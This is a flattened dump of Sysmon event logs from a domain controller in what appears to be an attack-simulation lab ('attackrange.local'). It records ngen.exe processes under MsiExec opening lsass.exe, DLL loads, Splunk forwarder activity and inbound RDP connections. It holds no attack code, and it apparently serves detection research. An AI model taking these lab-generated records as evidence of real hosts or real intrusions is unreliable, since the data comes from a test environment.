14:57:23.608{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.608{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.593{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.577{A7A01FEF-EBD3-607E-7D0C-00000000BB01}70844032C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.577{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7D0C-00000000BB01}7084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.577{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.577{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-7C0C-00000000BB01}4116c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.561{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.561{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.561{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.546{A7A01FEF-EBD3-607E-7B0C-00000000BB01}21005324C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.530{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7B0C-00000000BB01}2100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.530{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.530{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-7A0C-00000000BB01}3640c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000074218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.070{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21644-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.038{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24372-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.514{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-780C-00000000BB01}5340c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.514{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-780C-00000000BB01}5340c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.514{A7A01FEF-EBD3-607E-780C-00000000BB01}5340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.499{A7A01FEF-EBD3-607E-790C-00000000BB01}42685648C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-780C-00000000BB01}5340c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.483{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-790C-00000000BB01}4268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.483{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-780C-00000000BB01}5340c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.483{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-780C-00000000BB01}5340c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.468{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-760C-00000000BB01}6028c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.468{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-760C-00000000BB01}6028c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.468{A7A01FEF-EBD3-607E-760C-00000000BB01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.452{A7A01FEF-EBD3-607E-770C-00000000BB01}55806088C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-760C-00000000BB01}6028c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.452{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-770C-00000000BB01}5580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.436{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-760C-00000000BB01}6028c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.436{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-760C-00000000BB01}6028c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000074202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.436{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07DD39CB3A95D8D635402B550349BFF,SHA256=659B46EFB86AE4615A26E9393A2E53260EFB09267A7C591011057ED19670E84A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.436{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=232D1854FA5C119F1F1002A9D37C8F76,SHA256=D1B284AD0D25F1018FEB7E9B05E70204A9516AA22B44B3097716849739F1313D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.436{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-740C-00000000BB01}6360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 